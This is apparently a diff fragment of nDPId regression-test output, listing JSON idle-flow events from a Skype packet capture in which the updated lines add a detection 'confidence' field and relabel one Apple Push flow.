-00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969661414,"flow_last_seen":1431969661414,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.168","src_port":13021,"dst_port":40007,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00654{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1431969717899,"flow_last_seen":1431969784849,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":405,"flow_tot_l4_payload_len":1085,"flow_avg_l4_payload_len":90,"midstream":1,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"17.143.160.22","dst_ip":"192.168.1.34","src_port":5223,"dst_port":49447,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"ApplePush.Apple","breed":"Safe","category":"Cloud"}}
-00661{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969655400,"flow_last_seen":1431969655400,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.48","src_port":13021,"dst_port":40008,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00663{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969688514,"flow_last_seen":1431969688514,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.159","src_port":13021,"dst_port":40009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969670418,"flow_last_seen":1431969670418,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.32","src_port":13021,"dst_port":40009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969656410,"flow_last_seen":1431969656410,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.172","src_port":13021,"dst_port":40010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00663{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969677439,"flow_last_seen":1431969677439,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.166","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00663{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969713813,"flow_last_seen":1431969713813,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"176.97.100.249","src_port":13021,"dst_port":26635,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969682488,"flow_last_seen":1431969682488,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.28","src_port":13021,"dst_port":40014,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00663{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969683498,"flow_last_seen":1431969683498,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.154","src_port":13021,"dst_port":40017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969684467,"flow_last_seen":1431969684467,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.40","src_port":13021,"dst_port":40018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00663{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969679455,"flow_last_seen":1431969679455,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.176","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00663{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969676429,"flow_last_seen":1431969676429,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.165","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969664405,"flow_last_seen":1431969664405,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.141","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969685484,"flow_last_seen":1431969685484,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.31","src_port":13021,"dst_port":40021,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00663{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969667440,"flow_last_seen":1431969667440,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.143","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00661{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.17","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969653376,"flow_last_seen":1431969653376,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.142","src_port":13021,"dst_port":40023,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969657368,"flow_last_seen":1431969657368,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.153","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969686494,"flow_last_seen":1431969686494,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.29","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00661{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969655400,"flow_last_seen":1431969655400,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.42","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00661{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969653376,"flow_last_seen":1431969653376,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.15","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969669408,"flow_last_seen":1431969669408,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969665416,"flow_last_seen":1431969665416,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.43","src_port":13021,"dst_port":40001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969672489,"flow_last_seen":1431969672489,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.19","src_port":13021,"dst_port":40001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969655399,"flow_last_seen":1431969655399,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.24","src_port":13021,"dst_port":40001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969675413,"flow_last_seen":1431969675413,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.140","src_port":13021,"dst_port":40003,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969668393,"flow_last_seen":1431969668393,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.155","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969713813,"flow_last_seen":1431969713813,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.62.0.85","src_port":13021,"dst_port":33647,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969661414,"flow_last_seen":1431969661414,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.168","src_port":13021,"dst_port":40007,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1431969717899,"flow_last_seen":1431969784849,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":405,"flow_tot_l4_payload_len":1085,"flow_avg_l4_payload_len":90,"midstream":1,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"17.143.160.22","dst_ip":"192.168.1.34","src_port":5223,"dst_port":49447,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ApplePush","breed":"Acceptable","category":"Cloud"}}
+00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969655400,"flow_last_seen":1431969655400,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.48","src_port":13021,"dst_port":40008,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969688514,"flow_last_seen":1431969688514,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.159","src_port":13021,"dst_port":40009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969670418,"flow_last_seen":1431969670418,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.32","src_port":13021,"dst_port":40009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969656410,"flow_last_seen":1431969656410,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.172","src_port":13021,"dst_port":40010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969677439,"flow_last_seen":1431969677439,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.166","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969713813,"flow_last_seen":1431969713813,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"176.97.100.249","src_port":13021,"dst_port":26635,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969682488,"flow_last_seen":1431969682488,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.28","src_port":13021,"dst_port":40014,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969683498,"flow_last_seen":1431969683498,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.154","src_port":13021,"dst_port":40017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969684467,"flow_last_seen":1431969684467,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.40","src_port":13021,"dst_port":40018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969679455,"flow_last_seen":1431969679455,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.176","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
